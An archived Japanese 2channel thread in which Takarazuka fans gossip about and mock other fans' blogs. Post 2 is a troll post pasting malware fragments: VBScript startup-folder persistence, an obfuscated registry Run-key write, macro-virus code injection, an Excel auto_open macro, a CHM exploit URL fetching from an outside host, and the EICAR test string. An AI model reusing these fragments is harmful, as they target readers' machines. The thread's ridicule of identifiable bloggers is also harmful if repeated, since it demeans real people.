2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

宝塚サイトウオッチスレ

1 :名無しさん@花束いっぱい。:2006/10/23(月) 13:55:21 ID:2DlPSNZi
ヅカ版も立ててみました。

〜ヲチスレ最低限ルール〜
1 カキコはつぶやくようにほのぼのと
2 個人叩きは禁止です
3 粘着さんはサヨウナラ
4 直リンさんは逝って良し
5 ヲチ先に出張カキコはしちゃダメダメ

2 :<body onload=window()>:2006/10/23(月) 16:27:13 ID:tUhWLmw1
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

3 :名無しさん@花束いっぱい。:2006/10/23(月) 18:41:53 ID:p2okBgWF
あげとくね。

4 :名無しさん@花束いっぱい。:2006/10/23(月) 19:02:46 ID:qrQIgWoL
さっさと削除しろ。


5 :名無しさん@花束いっぱい。:2006/10/23(月) 19:47:56 ID:J8goqZGL
qrQIgWoLは、何かやましいことでもあるのかな?
ここで例のあさこファンのアイタタちゃんを語ればいいのかしら?w

6 :名無しさん@花束いっぱい。:2006/10/23(月) 20:07:39 ID:DzcqNc5l
佐賀県

7 :名無しさん@花束いっぱい。:2006/10/26(木) 01:20:37 ID:OQSsxjJi
い○ご大福は、○○○さんのブログに噛み付きたいなら
ネチネチ書いてないで直接メールすりゃいいのに。
あちらさんは、ちゃんとメアドさらしておられるんだから。

8 :名無しさん@花束いっぱい。:2006/10/26(木) 04:13:50 ID:xdFX0zKQ
冬眠中の人達早く再開してほしいなあ。

9 :名無しさん@花束いっぱい。:2006/10/26(木) 07:48:51 ID:k5IligF5
あれって冬眠という名の閉鎖じゃないの?
再開するかなぁ

10 :名無しさん@花束いっぱい。:2006/10/29(日) 19:16:30 ID:Ax11Tjhz
>7
なんかまた喧嘩売ってるよw
買いそうにもないけど

11 :名無しさん@花束いっぱい。:2006/10/31(火) 01:32:31 ID:dQ5wunoj
立ち上がらねばみたいな事をしきりに言ってる割には
コメント欄もなくしてメール等の連絡手段もなし
誰ともコミュニケーション取らずにグチグチ陰口を言うだけだな

12 :名無しさん@花束いっぱい。:2006/11/01(水) 00:54:25 ID:oCLN1ZZP
ヅカ歴17年って言うほどちゃんと見ちゃおらんだろ・・・
22としても5歳だよ?w

大福のリアル友らしき大学生さんのブログを発見したんだけど
その学生さんはちゃんとコメント欄開放しておられたんで
そちらに被害が及ばないことを祈る・・・(日記帳のとこじゃないよ、念のため)


13 :名無しさん@花束いっぱい。:2006/11/03(金) 18:20:11 ID:g6cYMn65
いやたてたんだ、、、今更ですが。
まぁ個人のHPとはいえ○○ファンと名乗るからには
あんまりな内容は困るよね・・・ていうかみんな
自分と同じように思ってるなんて思わないで欲しい。


14 :名無しさん@花束いっぱい。:2006/11/07(火) 19:50:49 ID:7S3w8lOl
どうもまた所信表明らしきことをしているが
…本気であれが正義だと思っているのだなぁ…。


15 :名無しさん@花束いっぱい。:2006/11/08(水) 22:58:12 ID:gYIovXog
ここじゃそんなに話題になってないのに
彼女のハンドルで検索する人が多いってことは
ほかでも話題になってるのかしら
ヲチ対象としてはかなり香ばしいからなw

16 :名無しさん@花束いっぱい。:2006/11/09(木) 00:00:15 ID:H+ftHPAz
>>7
真っ向から噛み付いてる様子にワロタ
相手方にレスポンスされない(出来ない)安全なところでw
まあ相手方は気付きもしないし、もし知っても気にも留めないだろうけど。

17 :名無しさん@花束いっぱい。:2006/11/09(木) 23:01:34 ID:/NB2ru7X
やっぱあそこはウォッチされてたのかw

18 :名無しさん@花束いっぱい。:2006/11/10(金) 14:01:55 ID:mIhVBXNG
ヲチされてること気がついてるのかな?
あそこって、確か秘密日記の機能もあったよね。
どうしても毒吐きしたかったらそっちに書けばいいのにさ。
あ、でも、そしたらヲチの楽しみが。。。w

19 :名無しさん@花束いっぱい。:2006/11/12(日) 21:28:45 ID:GAkloB2m
話ぶった切って悪いんだけど、
タモさんのブログに変なコメントつけてる人、あれ何?
病気なの??
あんなのに取り付かれてタモさんもお気の毒・・・

20 :名無しさん@花束いっぱい。:2006/11/12(日) 23:43:44 ID:aip8tBjJ
○玉?

21 :名無しさん@花束いっぱい。:2006/11/13(月) 00:07:26 ID:bSkB6Hd+
○玉、トヨだの代理だのプーさんだの、いくつも名前持ってるっぽい。

22 :名無しさん@花束いっぱい。:2006/11/13(月) 08:10:41 ID:v3N9mB/X
ほんとアレ異常だ!水〇(変名色々)
理事さまストカのようにも思われるんだけど、
理事さま会あたりは特定できてるんじゃないかな。
いくら同期でも、参るね〜

23 :名無しさん@花束いっぱい。:2006/11/14(火) 07:38:34 ID:IQ159Jag
http://www.ujura.jp/hbbs3/hyperthread.cgi?mode=view;Code=527

コテハン?

24 :名無しさん@花束いっぱい。:2006/11/14(火) 19:45:56 ID:9/xtJtOv
タカコさんが、タカコさんの時は、タカコさんが特別、タカコさんは…
同情します…。

うざっ。

25 :名無しさん@花束いっぱい。:2006/11/14(火) 23:35:51 ID:Scnj00ZZ
配役についてはノーコメントといいつつ、残念がってまつよ、あの人。

で、現実逃避したいらしく、公式でも公になってない写真集発売のことバラしてる。
いいのかな〜?いつ頃発売まで書いちゃって。

26 :名無しさん@花束いっぱい。:2006/11/15(水) 00:16:00 ID:w+pWgrES
>>25
まじにやばい気がする。
ネットに書くのと、劇場周辺でおしゃべりするのとは
違うのに・・・・ 
嗚呼・・・今後本人に迷惑がかからない事を祈ります

27 :名無しさん@花束いっぱい。:2006/11/15(水) 01:54:59 ID:xW7R5a41
これで、もしも階段降りの順番まで逆転することになったら
ものすごいことになりますな・・・
(きりやんエトワールでもヤバイかも)

例の変名いろいろの水○、今度は樹里ちゃんちに登場してない?
13日のコメントのイ○ゴ、絶対そうだと思うんだけど。

28 :名無しさん@花束いっぱい。:2006/11/15(水) 11:36:08 ID:8gB3bxoi
これね↓
あぁここにも、イシちゃんみたいな人が発見!お誕生日おめでとうございます(o^∀^o)お誕生日って、何才になっても、嬉しいもんですね!
| イチゴ | URL | 06/11/13 17:13 | 512n1Ia6 |

間違いないね。ひたすら無視抹殺しか手がないのかも…

29 :名無しさん@花束いっぱい。:2006/11/16(木) 00:12:28 ID:7Ppc3RbO
>>22
なんか霧エトワールって気がしてきた。(;´∀`)・・・うわぁ・・・

30 :名無しさん@花束いっぱい。:2006/11/16(木) 00:15:54 ID:7v3AMQpX
あっちもこっちもいちごが大暴れ・・・

31 :名無しさん@花束いっぱい。:2006/11/16(木) 01:11:47 ID:CFlpVE/m
しばらく出てこないって言ってたのにまた出てきてる。
あさゆひ詐欺師でいいじゃんか。きりのエッフェルだっていい役なんだろうし。
もっとあったかい気持ちで見れば楽しいのに。
せっかく好きなジェンヌさんの出てる舞台なのに、
イライラしながら見てたらつまんないと思うんだけど。
よっぽど私生活でストレスたまってんのかしら。

32 :名無しさん@花束いっぱい。:2006/11/16(木) 21:00:09 ID:shvfuw0/
片方には出て行って欲しいなあってか。

33 :名無しさん@花束いっぱい。:2006/11/16(木) 21:46:48 ID:Pm+BDTVU
出ていって欲しいほうが動かなくて、出ていって欲しくないほうが動いちゃったら壊れるだろうね、あの人www

34 :名無しさん@花束いっぱい。:2006/11/16(木) 23:27:37 ID:VoY12wuu
でも、なんかそうなりそうな気がするわw>33
星がほんとにエリザするならきりやんの方がいいだろうし、
花だったら特出でお試し済だし。




35 :名無しさん@花束いっぱい。:2006/11/17(金) 10:16:43 ID:7Vnhh4K8
ひさびさに8に行ったら、麻子ちゃんのスレに
ブログの文章まんまコピペされてた。orz
誰も気がついてないんだろうか?

36 :名無しさん@花束いっぱい。:2006/11/17(金) 11:02:45 ID:27XFQtFo
>35
しかもそれにレスしてるヤシいないか?
普通にあそこに書かれた、と思ってそう…

あと写真集の件も多分あの人のを見て書いた感じだな、短いけど。

37 :名無しさん@花束いっぱい。:2006/11/17(金) 16:11:59 ID:7Vnhh4K8
>36
写真集の件は会メールでお知らせがあったらしいから、
一概には言えないと思うけど・・・

38 :名無しさん@花束いっぱい。:2006/11/17(金) 19:30:51 ID:4DIap4ek
いやいや、別スレの怒りのつぶやきのことだろ。>写真集の件
単語は伏字にしてあるけど自分もそう思った。

39 :名無しさん@花束いっぱい。:2006/11/17(金) 21:41:43 ID:7Vnhh4K8
>38
あー、なるほど。
あんまり8見ないから気がつかなかったよ。
わざわざ探しちゃった。w

40 :名無しさん@花束いっぱい。:2006/11/17(金) 21:47:23 ID:27XFQtFo
あの人、貼り付けられたのもう引っ込めちゃったw
意味はない、って意味あるじゃん。十分に。
貼り付けられたからでそw

またその内出すとか書いてるけど、出さないほうがいいんジャネ?と思うけどねぇ。

41 :名無しさん@花束いっぱい。:2006/11/18(土) 11:58:19 ID:rHrV15n9
blogに書いたらどうなるかちょっと考えたらわかることだろうに…

42 :名無しさん@花束いっぱい。:2006/11/18(土) 20:21:25 ID:2uQod7jr
でも前2の月スレに貼られたヤツはまだ残ってるよな?
8は見てるけど2は見てないのかな?

43 :名無しさん@花束いっぱい。:2006/11/19(日) 00:03:20 ID:hlPBhpQ+
コメントもつけられないんだし、メールも送れないんだし
ご本人もあちこちカキコに行ったりもしないようだし
炎上させたくてもさせようのないblogなんだから、
いちいち消す必要ないと思うけどね。
貼られて消すくらいなら書かなきゃいいのに。
でも、いろいろやってくれた方がヲチする分には・・・w

44 :名無しさん@花束いっぱい。:2006/11/19(日) 13:06:45 ID:oQPuHTYC
>炎上させたくてもさせようのない
こわっ!
どっちもどっちと双方をこちらで魚してたけど
異論に破壊を対置する>43って・・・

45 :名無しさん@花束いっぱい。:2006/11/19(日) 13:29:52 ID:A8jPZtkW
>44
43が炎上したいんじゃなくてさ
炎上させないように完全にガードして書いてるんだから
いちいち取り下げる必要もないだろ?ってことでしょ。

あれくらい書くくせに何もコンタクト取れないよにしてるのは
ある意味卑怯だとは思うけどね

46 :名無しさん@花束いっぱい。:2006/11/19(日) 15:18:43 ID:NvMenpWy
>44
双方ってのは
い○○と
こ○○?

47 :43:2006/11/19(日) 16:32:30 ID:hlPBhpQ+
そんな怖いこといたしませんわ〜w >44
まったりウオッチがここのルールじゃん。
45さんのご説明どおりですわ。

こ○○さんは一方的に絡まれてるなんだから
どっちもどっちと言われる筋合いはないんじゃないの?
全然タイプが違うじゃん。あちらさんはメアド公開なんだし。
このスレと いち○の双方、ってのならわかるけど〜w

48 :46:2006/11/19(日) 17:20:35 ID:NvMenpWy
こちらで魚してってあるから
もう一方はどこかな?と思ってさ。
他に対象が無いし。

49 :名無しさん@花束いっぱい。:2006/11/19(日) 18:47:10 ID:t/RV6JUr
44さんに再登場してもらわないとわかんないね.
もし46さんの指摘したとおりだって言うなら
どこが「どっちもどっち」なのかお聞きしたいわ〜

50 :44:2006/11/19(日) 20:26:29 ID:oQPuHTYC
ここでの過剰反応なお方とあそこの管理人よん。
43、いやーついキーが滑ったと?w
少し冷静におなりあそばせ〜


51 :名無しさん@花束いっぱい。:2006/11/19(日) 20:55:38 ID:A8jPZtkW
44の言ってることがさっぱりわからんのは私だけ?
なんかすっごい鼻に付くお人ですね

52 :43:2006/11/19(日) 21:03:25 ID:NvfIqePO
良かった!わかんないのは私だけかと思った。w

キーが滑ったってのも?だけど
冷静になれといわれる理由もわかんないし。orz
ついでに、ここで過剰反応してる人なんていたっけ?




53 :名無しさん@花束いっぱい。:2006/11/19(日) 21:12:40 ID:igalIvQb
コテハン化してるやつみんなまとめてどっかいっちゃえばいいのに。

54 :名無しさん@花束いっぱい。:2006/11/20(月) 22:04:26 ID:oK5cG9Ib
あの人、まーちゃん好きなんだ。
ふーん。

55 :名無しさん@花束いっぱい。:2006/11/20(月) 22:31:22 ID:oK5cG9Ib
連投スマソ。
消した話、再掲してた。
(苦笑)連発に、こっちが苦笑だよ…

56 :名無しさん@花束いっぱい。:2006/11/20(月) 23:00:46 ID:4UPjdIzq
もしかして、ここにご本人降臨してたりして。www

57 :名無しさん@花束いっぱい。:2006/11/20(月) 23:10:28 ID:0qlTeTRV
脳内で勝手に決め付けて勝手に怒って
確信犯で書き連ねて見事ですわな。

こことか8でゆひ叩き率先してやってんじゃないかと思っちゃう。
マジファンは正直どう思ってるんだろうね。

58 :名無しさん@花束いっぱい。:2006/12/02(土) 00:11:57 ID:JzU2SSG4
卒業した某ジェンヌのファンブログ、痛さゆえマターリヲチしてたが、
またアフォやらかしたw
贔屓の名前のドメイン取ってどうすんだよw

59 :名無しさん@花束いっぱい。:2006/12/03(日) 18:28:48 ID:sXvW8SEv
今年を振り返って結局まだあのショーについて愚痴る例のあの人…
相当根に持ってるな

60 :名無しさん@花束いっぱい。:2006/12/03(日) 22:02:20 ID:PxEpifuT
おさとあさこの関係性こそいつもマンネリだったと思うんだがw

61 :名無しさん@花束いっぱい。:2006/12/04(月) 07:45:07 ID:/7jTs46Q
あさこの名前をおさに、ゆうひをあさこに変えたら
当時のおさファンの思いにも読めちゃうねw

62 :名無しさん@花束いっぱい。:2006/12/04(月) 11:55:02 ID:/M+fTlJz
>61
ほんとだw

63 :名無しさん@花束いっぱい。:2006/12/06(水) 00:04:07 ID:ILtQHl71
例のあの人、アサコのメディア出演が多くて情報とかって浮かれてるが。

レオンは柚木じゃなくて柚希なワケで

それも2回も書いちゃってるから素で間違えてないか?とツッコミたくなったw

64 :名無しさん@花束いっぱい。:2006/12/06(水) 15:40:14 ID:nBCSpB+C
 宝塚アンで出来たSNS と 人事部で出来たSNS
人事部のは掲示板荒らしの対処も出来ないのにSNSってのもな。。。。


65 :名無しさん@花束いっぱい。:2006/12/06(水) 19:37:32 ID:ILtQHl71
例のあの人、歌劇12月号購入したモヨン。
トプが1年を振り返るコーナーでアサコがレビジュに一言も触れてないことについて、
なんか内心ほくそ笑んでる感じがするのは漏れだけでせうか?

66 :名無しさん@花束いっぱい。:2006/12/08(金) 09:11:53 ID:N7ZqYd0V
最近の趣味は○○の悪口を言う事なんだ・・・ふ〜ん。
ダメ男とかあんな酷い事よく書けるわ。
そのくせ気持ち悪い妄想きつ過ぎるよ。

67 :名無しさん@花束いっぱい。:2006/12/09(土) 23:22:15 ID:eOe3GVUr
>65
ピンポーン!でしたな。w
もしくは、ここ読んでるのか?

68 :名無しさん@花束いっぱい。:2006/12/19(火) 00:32:00 ID:7hNQi+cU
某ブログ
かなみのことホント気に入らないんだね。
ヅカも殆んど観てないみたいだから
愚痴ってないできっぱりヅカ離れしちゃえばいいのに。
相手役変わったら戻るのかね

69 :名無しさん@花束いっぱい。:2006/12/19(火) 12:33:18 ID:wkbFidyt
どこのブログ?


70 :名無しさん@花束いっぱい。:2006/12/20(水) 02:12:40 ID:tSPhTMkI
例のあの人、お披露目からこっちの公演、ずっとトプコンビのラブロマンスとは思えないそうで。
今度の全ツ演目にエライ浮かれてるw





しかし、忘れてないか?
演出が貴女が一番苦手な演出家(ショーだけど)と二番手のあの子がバウで出られないことを…。

公演二番手に同期のあの方が再びくるかもしれんということを…。

71 :名無しさん@花束いっぱい。:2006/12/20(水) 15:36:15 ID:ZS1Qkazr
要は同期より贔屓が目立ててるか、だから
W2番手も演出家もどうでもいいんよ。
で、全ツの作品ってどんなの?

72 :名無しさん@花束いっぱい。:2006/12/25(月) 10:04:22 ID:olYJ4D7v
最後までダメ男だったなんて酷いこと書くね。
まったく自分の贔屓はとことん持ち上げて、相手役の事は貶めまくるんだから。
案外本当にネット隊っていたのかもね。
相手役ファンの殆どのブログは今までありがとうって感謝の気持ちで
締めくくっているのが多いのに。
あんな風に意地悪目線か、気持ち悪い妄想しか出来ないんだろうか?
あの方のファンの人達は。
扱いが悪いのは本人にも欠点があったからじゃないの?


73 :名無しさん@花束いっぱい。:2006/12/25(月) 11:00:13 ID:AKpio3FA
その人の文章よくわからないんだよね。
贔屓かと思ってたら、本当のファンの人に会って贔屓じゃなかったって
わかったって書いてたでしょ?
コンビファン?

74 :名無しさん@花束いっぱい。:2006/12/25(月) 13:48:08 ID:K17oT3ro
彼女は別の特定ジェンヌの熱烈なファンじゃないと思うけど。
今は雪組ファンなんだろうけどさ。
(コムリラコンビ好きだと思うけど、まーちゃん単体ファンではなさげ。)
書き方がああだから、表面しか読まない人には誤解されるんじゃないの?
熱狂的コムファンからしたら、いらつくのかもしれないけど
ちゃんと奥底には愛情を感じるけどな。
あそこはちゃんと連絡つくし、コメントもできるんだから
72は言いたいことあるなら直接聞いてこれば?
あたしは72みたいにしか捉えられない人のほうがちょいと怖いけどね。w

75 :名無しさん@花束いっぱい。:2006/12/25(月) 18:42:28 ID:hFpfcjsz
コンビファンなんだろうけど結局まーちゃん贔屓なんじゃないの?
とは思うんだけど?
でも本当のファンじゃないとか贔屓じゃないとか書いてて
どうにでも自分に都合よければいいのかな?とも思うし。
表面しか読まないって言っても、よく分からない文章だし
最後なんだからもう少し書き方に配慮があれば良いのにって思った。

76 :名無しさん@花束いっぱい。:2006/12/25(月) 18:45:54 ID:hFpfcjsz
あとちょっと、コンビを生身の男女のように妄想チックに書いてる
文章には正直ひくかも。言いたい事も分からない事はないんだけどねw

77 :名無しさん@花束いっぱい。:2006/12/26(火) 17:02:12 ID:iYySSQZg
ひくといえば、

ふ○きのブログはここのところ絶好調にオモロイなw。
魚しがい有、怒らず読んでみ。

78 :名無しさん@花束いっぱい。:2006/12/27(水) 18:01:44 ID:K/p7pRcb
最強リンクに最近載ったブログのル●
って何かムカつく人柄を連想させる文章だし。


79 :名無しさん@花束いっぱい。:2006/12/28(木) 01:37:42 ID:MzOeUAxV
自分の妄想と現実を混乱しかけてる人は本当にやばいよな。
てかあなたの思うほどあの人たちは(確かに世間ずれしてない分ちょっとアレだが)
浅慮でもないし自分の未来を単純に捉えてもないから!
…と書き込んだら暴れそうだ。

80 :名無しさん@花束いっぱい。:2006/12/28(木) 07:27:49 ID:bxMSSNyu
age

81 :名無しさん@花束いっぱい。:2006/12/29(金) 01:59:34 ID:p3n79wAM
毒を吐く事が愛情表現と取り違えてる人も嫌だ。
私は他と違ってこうなんだからって言う人とか。イライラする。
そして、そういう奴に限って自分が叩かれる事に対して過剰反応する。
だったらネットじゃなくて紙に書けって話。
自己顕示欲の強い独りよがりの香具師は見ていて超みっともない。

82 :名無しさん@花束いっぱい。:2006/12/29(金) 09:04:15 ID:AZFs2tVN
じゃあ見に行かなきゃ良いじゃん。
個人サイトなんだから。

83 :名無しさん@花束いっぱい。:2006/12/29(金) 14:51:26 ID:gTzVRGrW
>82
同意。
81のウォッチぶりが怖い。

84 :名無しさん@花束いっぱい。:2006/12/29(金) 22:24:55 ID:+7m4HFNl
でもうっかり悪いモノ食べちゃったら、どっかで吐き出したくなるよね。
81タン、わかるよ、身体に残るもんw。
あそこは特殊だと割り切って見に行って笑うか、見たことを忘れるか。
自分は魚してるよ、ノドに骨がささっても、やめられない悪習慣みたいなもんだね。

85 :名無しさん@花束いっぱい。:2006/12/30(土) 13:39:39 ID:rLeHbQGB
断りもなく勝手に素材使ってる厨は来ないでくれ

86 :名無しさん@花束いっぱい。:2006/12/30(土) 14:31:03 ID:c2B5yLZD
最近見つけたんだけど大真みらんさんのファンブログ……ちょっとうざい。
調子乗ってるって感じ。

87 :名無しさん@花束いっぱい。:2006/12/30(土) 15:00:35 ID:/b3kemEk
月男スレに住んでるんだろうなぁ…い○ご大福

88 :名無しさん@花束いっぱい。:2006/12/30(土) 15:59:22 ID:rLeHbQGB
>86
 もしかして、パ●●って名の管理人?

89 :名無しさん@花束いっぱい。:2006/12/30(土) 16:41:39 ID:zO7qXWqB
自分の妄想と現実を混乱しかけてる人は本当にやばいよな。
てかあなたの思うほどあの人たちは(確かに世間ずれしてない分ちょっとアレだが)
浅慮でもないし自分の未来を単純に捉えてもないから!
…と書き込んだら暴れそうだ。

90 :名無しさん@花束いっぱい。:2006/12/30(土) 18:57:21 ID:c2B5yLZD
>88
うん。そう…

91 :名無しさん@花束いっぱい。:2006/12/31(日) 00:19:48 ID:8heAGWPR
>90
高校生か短大生なんだから、あんなもんだわよ。
調子乗ってるというより、あの年代の書く文章って感じ。
社会人になったらもうちょっと大人の文章書けるようになるんじゃないの?w

例のい○ご大福ちゃんも、まだ学生さんだから仕方ないのかもしれないけど
もうちょっと大人になればいいのに・・・と思うわ。
嫌なところを穿り出すより、いいところ見つけて好きになったほうが見てて楽しいと思うんだけど。

92 :名無しさん@花束いっぱい。:2006/12/31(日) 01:31:57 ID:E7J5YX2r
>高校生か短大生なんだから、あんなもんだわよ。
>調子乗ってるというより、あの年代の書く文章って感じ。

確かに。
じゅうぶん頭の悪そうな文章ではあるけれど、
もっとひどい文章のブログだっていくらでもあるよね

93 :名無しさん@花束いっぱい。:2006/12/31(日) 18:29:41 ID:Vp/QLtPE
レ●とかいう人のブログ、最近ぐっとコメント減ったね〜
いい年して、仕事とかしてないのかな?かしこむ一筋フォーエバー?

94 :名無しさん@花束いっぱい。:2007/01/01(月) 20:16:19 ID:CQXF7gEK
>>93

仕事はしてるみたいよ。何だか知らないが。前書いてた。

95 :名無しさん@花束いっぱい。:2007/01/02(火) 01:11:46 ID:GM/X0nGU
い○ご大福、あんなに月スレで嫌われてるとは。
ブログに書けばここでヲチされ、月スレに書けば嫌われ・・・w

96 :名無しさん@花束いっぱい。:2007/01/02(火) 16:19:04 ID:3CyzCAhu
かなめ会に入ってる瀬奈じゅん大好きな人のブログ見つけた。

結構前にこういう様なスレで話題になってた人だった。
妄想小説とか書いてた人・・・

97 :名無しさん@花束いっぱい。:2007/01/02(火) 19:21:40 ID:m0Ph4vgE
あかん。
むかつくファンサイトだから見に行かなければいいのに
行って毎日むかついてる私はあほか?

98 :名無しさん@花束いっぱい。:2007/01/02(火) 21:14:52 ID:Zpm6Tcdm
>>96
その人って美●って人?
妄想小説書いてたかは知らないけど、
凰稀かなめさんの会に入っててあさこさんが好きな人のブログ見つけたもんで…
あの子ちょっとヤバイよね……


>>97
その気持ち分かるぞ。
漏れも一緒。

99 :名無しさん@花束いっぱい。:2007/01/02(火) 21:33:29 ID:qE+z86qs
>97,98
そういうの「嫌よ嫌よも好きのうち」って言うんだよ。
毎日むかつきに行くって奇特っていうかドMだな。

100 :名無しさん@花束いっぱい。:2007/01/02(火) 21:38:13 ID:JiJL97Da
100

101 :名無しさん@花束いっぱい。:2007/01/02(火) 23:43:56 ID:gjwnn9tP
>>94
そうなんだ。何か毎日毎日同じようなことばっか、つらつら書いてて、何やってんだろーと思ってさぁ。
呆れつつも、たまに覗いてしまう私もやっぱりMなんだろうかw

もう閉鎖した、○ンダとかいう幼稚園児並の高校生や、ミズ命の美○も、何か…(何気に覗いてる自分w)
一番、面白みを感じなかったのは、主婦こ○みwってか、おばさんが妄想してることが有り得ないよね。今どうしてるんだろ。

102 :名無しさん@花束いっぱい。:2007/01/03(水) 00:16:28 ID:MZabEVB+
>>97
そのニラニラが楽しく思えるようになったら、立派なヲチャー

103 :名無しさん@花束いっぱい。:2007/01/03(水) 00:32:59 ID:QupyTTlA
ダンちゃんは壇ちゃんではなく檀ちゃんですから‥。
アサコファンのあなた!
書いていいこととダメなこと!わきまえて下さい。
轟さんを、癌みたいだなんて‥なんで苦情がこないのよ。

104 :名無しさん@花束いっぱい。:2007/01/03(水) 00:56:14 ID:YlnqEEXA
でも確かに癌っぽいよね…顔色悪いし細すぎ

105 :名無しさん@花束いっぱい。:2007/01/03(水) 18:02:00 ID:iH6yN9oz
>>98
その子、私知ってるかも;;
あさこの事、じゅんじゅんって言う子でしょ!?
確かにヤバイ(・∀・);;
人の真似ばかりしてるってあるサイトで叩かれてたわ(汗)
まぁガキみたいな高校生だし仕方ないんだろうけどね。

106 :名無しさん@花束いっぱい。:2007/01/03(水) 21:17:50 ID:Cy6irLKi
;;とか(汗)とかも充分ガキみたいだがな

107 :名無しさん@花束いっぱい。:2007/01/04(木) 00:21:32 ID:9oKR6t9i
高校生のガキのことはほっといてやれよ。
裏のほうは普通の高校生ちっくなブログだったし。
そのうち飽きるか、就職して忙しくなったらやめるでしょ。
学生のブログなんてそんなもんさ。




108 :名無しさん@花束いっぱい。:2007/01/04(木) 12:36:35 ID:uanLu079
アサコって碌なファンがいない。

109 :名無しさん@花束いっぱい。:2007/01/04(木) 21:51:58 ID:PNQ7l4Cz
例のあの人、オサアサでコンビ組ませたから勘違いが生まれたんだとさ

コンビの魅力の感じ方は受け手である観客それぞれだっての
オサアサで魅力感じる人もいりゃアサカナで魅力感じる人もいるだろう

アータの感じ方がアサコファンの総意みたいな書き方はどうよ?

110 :名無しさん@花束いっぱい。:2007/01/05(金) 07:08:19 ID:EANsXk8S
こんなとこで愚痴らんで、直接Commentとかで言ってやれ!

111 :名無しさん@花束いっぱい。:2007/01/05(金) 10:29:27 ID:/1z0vxxi
い○ごさんのとこは、コメントもメールも受け付けてないわよ〜w
組スレでグチグチ言うよりここでつぶやいてたほうがずっといいよ。
ヲチ板に行くのがいちばんいいんだけど、
ヅカ板の住人って、行く人少なそうだから無理でしょ。


112 :名無しさん@花束いっぱい。:2007/01/05(金) 12:33:49 ID:8A0lQ2AS
ちょっと前にオサアサ売りは良かったって
書いてなかったっけ?

113 :名無しさん@花束いっぱい。:2007/01/06(土) 16:29:21 ID:DZxjy+oL
宝塚の画像を貼りまくった自分のHPのURLをファソレターに書いたアイタタ七ファソ発見。
書いたファソレターとか自分のプリクラも貼ってる。
「来てくれるといいなぁ」だってorz

114 :名無しさん@花束いっぱい。:2007/01/07(日) 01:13:24 ID:z2mPmCOZ
いい年して「でつ」「まつ」使いまくりの人って何考えてんだろ。
池沼みたい。

115 :名無しさん@花束いっぱい。:2007/01/07(日) 01:32:36 ID:wObIO3Zb
>>114
VIPPERなんじゃない?www
もしくは、単なるちゃねらー。
普通の子はでつまつなんて使わない。

116 :名無しさん@花束いっぱい。:2007/01/07(日) 23:19:00 ID:LJBL1fN6
例のあの人、かなりキテるなw
同じ日で2枠使ってグチグチグチグチ…
負のエネルギーが止まりません、って感じだ

ユウヒの場面でミラーボール回ってたつーことにまでキレてる

その反動か、アサコの写真集の写真が見られたようでそっちではかなりイタタなカキコしてるし

ホント、魚し甲斐がある

…しかし、どうにかしないと、と言いながら一体いつになったら劇団に突撃するんだろうか?w

117 :名無しさん@花束いっぱい。:2007/01/08(月) 19:57:58 ID:gofqOzpo
学生ブログなんて放っておけ。社会に出たら自分の事で
手一杯になっていつの間にか消えるでしょ。
ああいう文体は右も左も分かっていない若者の特権。
↑の子に限らず他の学生ブログもまた然り。

118 :名無しさん@花束いっぱい。:2007/01/08(月) 23:47:26 ID:Wj+Kf1Qe
お子ちゃまブログは放っておく、には同意だけど
い○ごだけは別。
いちいち他人のブログに絡んだりするしさ。

>ホント、魚し甲斐がある

こっちに同意だなw

119 :名無しさん@花束いっぱい。:2007/01/09(火) 00:03:29 ID:Jzh9XlQe
>いちいち他人のブログに絡んだりするしさ。
これってよく言われてるけど、い○ごってどこかに絡んだりしてるっけ?

120 :名無しさん@花束いっぱい。:2007/01/09(火) 00:34:31 ID:mqcBmFV9
ゆうひ君に好意的な書き方してるところが月組の公演に関して何か書くと
それにいちいち反論してるよ。
今年はまだ、いちいち絡まれてるところの管理人さんは
月組見に行ってないみたいだけど、
見に行ってゆうひ君を誉めたりしたら・・・((((;゜Д゜)))


121 :名無しさん@花束いっぱい。:2007/01/09(火) 00:35:54 ID:Y6AoY72j
同じダイ○リーノ○トの有名どころ(?)ブログにイチャモン付けてる。
T子さんの歌とH子さんの歌に関して
こういう感想を言ってる人がいるけど
私は全くそう思わない、みたいな。

つかご贔屓さんは男役とのコンビは合わない。
って言ったそばから
Kやん、Hろみとのコンビは肯定w
Oサ以外の男役は誰もダメなんじゃなかったっけ?
結局許せないのはAサYヒだけじゃねーかw

122 :名無しさん@花束いっぱい。:2007/01/09(火) 01:07:04 ID:VRot023R
あの人、月の体制がどーとかっていうより、ただ単にゆーひが気に入らないだけじゃん。


123 :名無しさん@花束いっぱい。:2007/01/09(火) 01:28:55 ID:2t1Mzk9w
もしYが異動でもしたら矛先はKに向くかも。
Aだけが良けりゃいいのが丸分かり。

124 :名無しさん@花束いっぱい。:2007/01/09(火) 19:33:53 ID:AEjLJXmB
組全体がどうじゃなくて、Aだけ良ければ幸せ(はぁと)だからね。
まぁ若いってことだなw

125 :名無しさん@花束いっぱい。:2007/01/10(水) 01:58:08 ID:6liYmJ14
若いからどーこーではなく、おかしいんだよ脳の回路が。
若くてもマトモなやつはおる。

126 :名無しさん@花束いっぱい。:2007/01/10(水) 03:05:28 ID:zzzPXS6Y
ヅカ関係は年配の人のブログの方が悲惨だったりするからね。
